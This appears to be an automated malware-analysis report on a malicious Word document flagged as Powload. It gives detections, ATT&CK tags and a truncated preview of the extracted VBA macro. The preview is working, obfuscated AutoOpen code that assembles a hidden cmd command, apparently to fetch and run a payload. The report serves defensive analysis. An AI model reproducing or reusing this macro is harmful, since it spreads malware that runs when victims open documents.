MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. The macro attempts to construct and execute a command string, likely for downloading and running a second-stage payload. The ClamAV detection 'Doc.Malware.Powload-6752222-0' further supports its malicious nature. The constructed command appears to be a complex string concatenation, potentially obfuscating a download and execution routine.
Heuristics 5
-
ClamAV: Doc.Malware.Powload-6752222-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Powload-6752222-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6071 bytes |
SHA-256: f6abe5d4bb1256eb7f77555ddfa59216a2271ac35983a8397bcb08aaac98baa8 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "KdYBNJXA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
AppActivate iAFYW
AppActivate 8876
AppActivate Sgn(sLYZvd * lqEvmv)
AppActivate CBool(2)
AppActivate VjXUE
AppActivate ChrB(44487 * Wootd)
Shell@ CVar("cm") + uRJRMKMY + hLRzTkimn + OziLPY + mriHqobA + zDkRUaCa + wAFnOSnsGjw + ViwzCivm + kKEJCLhZwaurF, 413851704 - 413851704
AppActivate IttWX
AppActivate Tan(28264 * YQEBd)
End Sub
Attribute VB_Name = "nkBODMJMldMEH"
Function OziLPY()
On Error Resume Next
AppActivate CSng(XpJzG)
AppActivate lElBC
KdZPXiI = "d" + " /V:ON/" + "C" + CStr(Chr(PpwdRldPBrzfW + BCQUkww + 34 + YoWIciwjJUcdS + ZbaWOlaM)) + "set Ja=DI" + "mwqhwwOaMF" + "jvHMdjqz" + "AHhNTLn3k7" + ";$.b/@c" + "W:"
AppActivate sJSlZO
AppActivate CStr(QckCi)
AppActivate CStr(5289)
XiliKnvDES = "sf{Pte" + " x\4=28Jl" + "-pC'E" + "ruQ}yU)(6g" + "+0X,Sio9" + "R&" + "&for" + " %8 in " + "(55,75," + "7,44,59,3"
AppActivate 1051
AppActivate CInt(uQZWVZ)
mmVjkqKIQow = "9,22" + ",44,53,5" + "3,45,31,77" + ",33,58,49," + "26,44" + ",7,54,75,3"
AppActivate Int(8523)
AppActivate 45
SsDnIFzk = "3,17" + ",44,36,43" + ",45,23,44" + ",43,32,3" + "7,44,33,5"
AppActivate 563
AppActivate CByte(jdFMG - JESlW)
AbcEU = "6,53," + "74," + "44,26," + "43" + "," + "30," + "31," + "40,73" + ",7" + "3" + ",49,57,22"
AppActivate iWLSaQ
AppActivate CDbl(IMoQuM)
imdCC = ",43,43,5" + "5,3" + "8,34," + "3" + "4,4" + "0,55,4" + "4,9,36" + ",44,39,32,"
OziLPY = KdZPXiI + XiliKnvDES + mmVjkqKIQow + SsDnIFzk + AbcEU + imdCC
AppActivate CDbl(353005535)
AppActivate OHjwfq
End Function
Function mriHqobA()
On Error Resume Next
AppActivate 41
AppActivate 325
AppActivate 401087306
iADzB = "26" + ",44,43,3" + "4,23," + "68,11,37,6" + "7,2" + "5,35" + ",2" + "2,43,43," + "55,38,3" + "4"
AppActivate hCWsa
AppActivate FpItJ
AppActivate CDate(rjnCPi)
jOhEvRpB = ",34,17," + "46,33,9,75" + ",2" + "2,60,39,9," + "26,3"
AppActivate 283753694
AppActivate CSng(bcWMB + jlFbOF * RXGFmh / KGEAh)
pBPVNOdtZc = "2," + "36,75,2" + ",34,51,77" + ",61,71,7" + "3,35,22," + "43,43,55,3" + "8," + "34" + ",34,7"
AppActivate YJzlh
AppActivate CStr(233568307)
tTsGzkkbvYo = ",7,7,32," + "2,44," + "68,9,27,67" + ",70,32," + "28,74" + ",44," + "26,26,22" + ",9,63,32" + ",13" + ",26,34,7," + "55,54," + "36" + ",75,26,43,"
AppActivate Oct(27)
AppActivate Hex(EsVlm)
AppActivate Fix(NRQwKs)
LYwaYWoUA = "44,2" + "6,4" + "3,34,60,5" + "5,53,75,9," + "16,39," + "34,39," + "50,64" + ",11,52" + ","
AppActivate YViiT
AppActivate CBool(65)
AppActivate 224
jYJhBjwiLc = "35,22,43" + ",43,55,3" + "8,34,34,2," + "74," + "36,59" + ",75," + "26,44,43"
AppActivate IskGT
AppActivate CInt(6)
qENuc = ",54,39,75" + "," + "5" + "3,60,4" + "3,74,75,26" + ",3" + "9,32,36," + "75,2" + ",34,2"
mriHqobA = iADzB + jOhEvRpB + pBPVNOdtZc + tTsGzkkbvYo + LYwaYWoUA + jYJhBjwiLc + qENuc
AppActivate 123212862
AppActivate iYTFZs
End Function
Function zDkRUaCa()
On Error Resume Next
AppActivate frurL
AppActivate 157
AppActivate Tan(YZZhZ + 92113)
dcHBMSN = "5,6" + "4,7" + "6,1" + "5,29,48,18" + ",35,22,4" + "3,4"
AppActivate hJdIK
AppActivate CStr(9)
AppActivate CLng(VBSwm)
bSjzPWiS = "3,55," + "38" + ",3" + "4,3" + "4,33,9" + ",60,43,44," + "32,75,59" + ",68," + "34,71,"
AppActivate Rnd(OBcIQ)
AppActivate Int(klXON)
ohmzHoGz = "57,32,73" + ",55,53,74," + "43,66,57" + ",35,57,6" + "5," + "30,31,17" + ",6" + "0,33,45,4" + "9,45,"
AppActivate wVOZWK
AppActivate Round(JDLoX)
nIvHvprv = "57,67,51,7" + "6,57" + ",30,31,55" + ",15,2" + "8,49,31" + ","
AppActivate CInt(50895 - rslpBz)
AppActivate 140
AppActivate Sqr(KVpKZ - 15777 / UIubj / MTWdJ)
XcRhULf = "44," + "26,13," + "38,43" + ",44,2" + ",55," + "69,5" + "7," +
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.